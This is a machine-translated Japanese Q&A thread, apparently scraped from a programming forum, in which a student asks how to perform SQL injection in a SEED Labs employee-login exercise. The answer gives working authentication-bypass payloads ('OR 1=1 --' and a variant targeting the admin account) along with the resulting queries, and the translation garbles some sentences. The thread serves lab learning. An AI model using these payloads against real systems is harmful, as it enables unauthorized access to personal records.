SQLプログラミングは比較的新しいので、私たちのラボでは、次のコードに基づいてウェブサイトの従業員IDフィールドに文を挿入するように求められています。 1 = 1 name = "admin"と入力するだけですが、これはうまくいかないようです。シードラボでSQLインジェクションを行う方法
答えて
ここでSQLを挿入する方法の1つは、userIdに常に当てはまる条件を挿入し、パスワードを処理する条件をコメントアウトすることです。
例えば、次の点を考慮してください
$input_eid = "1' OR 1=1 --";
$input_pwd = "does not matter";
これは、次のSQL生成する必要があります:あなたが見ることができるように、このクエリは関係なく、データベース内のすべての行を明確に返します
SELECT id, name, eid, salary, birth, ssn,
phonenumber, address, email, nickname, Password
FROM credential
WHERE eid= '1' OR 1=1 -- and password='does not matter'
をあなたが注射しているパスワード。
EDIT:
以下のコメントでの要件の明確化を1として、あなたは管理者の詳細を取得するname='admin'
と「OR 1 = 1」の部分を置き換えることができます。有効なIDではないものから始めるようにしてください。誤ってその詳細を取得しないようにしてください。例えば、次の点を考慮してください
$input_eid = " ' OR name='admin' --";
$input_pwd = "does not matter";
あなたが管理者の詳細を照会します以下のSQL、取得したい:https://www.youtube.com/watch:私は見てお勧めします
SELECT id, name, eid, salary, birth, ssn,
phonenumber, address, email, nickname, Password
FROM credential
WHERE eid= ' ' OR name='admin' --' and password='does not matter'
あなたが注射する必要があるのは、タイプが「1 'OR 1 = 1 - 」です。社員IDフィールドに入力すると、パスワードフィールドは無関係になりますか? –
@JohnW間にどこにでも入力を殺菌しないと仮定した場合、そうする必要があります。 – Mureinik
これは現在どのように動作しているのか理解していますが、意図したとおりに動作しないようです。完全な質問は次のとおりです。adminという管理者のアカウント名はわかっていますが、IDまたはパスワードはわかりません。攻撃に成功するには、[Employee ID]と[Password]フィールドに入力する内容を決定する必要があります。 –
- 1. SQLインジェクションの防止方法
- 2. このコードでSQLインジェクション攻撃を実行する方法は?
- 3. SQLインジェクションからサイトを防ぐ方法
- 4. asp.net - SQLインジェクション攻撃後のクリーンアップ方法
- 5. SQLインジェクション
- 6. 法的サイトSQLインジェクション攻撃
- 7. プロシージャを実行するこの方法はSQLインジェクションから安全ですか?
- 8. MSAccessをSQLインジェクション
- 9. POJO経由でHibernateでSQLインジェクションを防ぐ方法
- 10. DisguiseでのSQLインジェクション
- 11. INSERTでのSQLインジェクション
- 12. server_processing.phpでのSQLインジェクション
- 13. ユニオンでのSQLインジェクション
- 14. mssqlノードモジュールでSQLインジェクションを処理する方法
- 15. SQLインジェクションをC言語で防ぐ方法は?
- 16. "IN"条件内でSQLインジェクションを利用する方法は?
- 17. Select InsertでSQLインジェクションを防ぐ方法は?
- 18. JavaでSQLインジェクションを検出する方法
- 19. MVCでSQLインジェクションを制御
- 20. SQLインジェクション? CHAR(45,120,49,45,81,45)
- 21. コメントフィールドにSQLインジェクション
- 22. SQLインジェクションcshtml
- 23. 停止SQLインジェクション
- 24. DVWA SQLインジェクション
- 25. EJB3 SQLインジェクション
- 26. SQLAlchemy + SQLインジェクション
- 27. フォームハック/ XSS/SQLインジェクション
- 28. プリペアドステートメントとSQLインジェクション
- 29. SQLインジェクション(java)
- 30. HibernateとSQLインジェクション
を? v = ciNHn38EyRc – Rafa
そのコードはそれに構文エラーがあるので100%安全です – rtfm